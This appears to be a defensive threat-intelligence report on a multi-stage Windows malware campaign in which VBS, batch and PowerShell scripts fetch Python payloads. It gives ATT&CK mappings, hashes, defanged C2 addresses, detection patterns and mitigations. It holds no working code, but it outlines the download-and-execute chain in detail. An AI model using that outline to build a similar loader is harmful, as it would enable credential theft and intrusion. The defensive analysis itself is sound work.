Full Report
Recently LevelBlue SpiderLabs initiated an investigation into a multi-stage malware delivery campaign initially identified from LevelBlue’s MDR SOC through a SentinelOne detection of a suspicious Visual Basic Script (VBS) file.
Analysis Summary
# Tool/Technique: Multi-Stage VBS-to-Python Delivery Campaign
## Overview
This campaign involves a sophisticated, multi-stage delivery chain designed to bypass traditional security perimeters. It begins with a suspicious Visual Basic Script (VBS) and evolves into a series of PowerShell and Batch scripts that eventually deploy Python-based payloads. The primary goal appears to be established persistence and information theft through open-source tool exploitation.
## Technical Details
- **Type:** Multi-stage Downloader / Malware Delivery Chain
- **Platform:** Windows
- **Capabilities:** Credential theft, persistence, remote command execution, and automated payload retrieval.
- **First Seen:** 2024 (LevelBlue SpiderLabs investigation)
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1059.005 - Visual Basic
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1140 - Deobfuscate/Decode Files or Information
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer
## Functionality
### Core Capabilities
- **Script-Based Chaining:** Uses a sequence of VBS, CMD, and PowerShell scripts to fetch secondary payloads, making detection via static signatures difficult.
- **Automated Download:** The scripts reach out to remote servers to pull down `.zip` archives containing the execution environment (Python) and malicious code.
- **Payload Extraction:** Automatically unzips and executes contents from archives like `64RUZPQ.zip` and `RUZPQ.zip`.
### Advanced Features
- **Dynamic Tasking:** Uses text files (e.g., `UKAA1.txt`, `UKBB2.txt`) hosted on C2 servers to provide updated instructions or URLs for the next stage of the attack.
- **Living-off-the-Land (LotL):** Minimizes the use of custom binaries in the early stages, relying instead on built-in Windows interpreters.
## Indicators of Compromise
- **File Hashes:**
- `F66364A3566D48E0588237E288003C541AE0FD73` (UKCC1.bat)
- `C72921D080EA0273F54B8CF2F7EF1241CCA16D71` (64RUZPQ.zip)
- `9B90E2C49B52620531A75D4F23DD48DA25670E03` (RUZPQ.zip)
- `A27315CE27675E953AEC70A7639E2EA3F77B7159` (UKAA1.txt/UKBB1.txt)
- **File Names:**
- `UKCC1.bat`
- `64RUZPQ.zip`
- `RUZPQ.zip`
- `UKAA2.txt`, `UKBB2.txt`, `UKFF2.txt`
- **Network Indicators:**
- `hxxp[://]103[.]145[.]12[.]195`
- `hxxp[://]64[.]226[.]122[.]217`
- **Behavioral Indicators:**
- Unusual `wscript.exe` or `cscript.exe` execution calling remote network resources.
- PowerShell commands containing `Invoke-WebRequest` or `Expand-Archive` targeting temporary directories.
## Associated Threat Actors
- **Unknown:** While the campaign was identified during an investigation into Israel-Iran geopolitical tensions, specific attribution to a known group was not finalized in the report.
## Detection Methods
- **Behavioral Detection:** Monitor for secondary script execution (Batch/PowerShell) spawned by `wscript.exe`.
- **SIEM Rules:** Look for PowerShell downloading files from direct-to-IP URLs rather than established domains.
- **Endpoint Monitoring:** Detect the creation of `.zip` or `.txt` files in the `%TEMP%` or `%APPDATA%` folders followed by immediate execution of a Python interpreter from those same folders.
## Mitigation Strategies
- **Prevention Measures:** Disable Windows Script Host (WSH) if VBS scripts are not required for business operations.
- **Hardening:** Implement AppLocker or Windows Defender Application Control (WDAC) to prevent scripts from executing in user-writable directories.
- **Network Security:** Block outbound connections to known malicious IP addresses and restrict PowerShell's ability to reach the internet via proxy configurations.
## Related Tools/Techniques
- **Python-based Stealers:** Similar to tools like "Blank-Grabber" or "LUMMA" that often use multi-stage script loaders.
- **Malicious VBS Loaders:** Commonly used in the delivery of Qakbot or Emotet.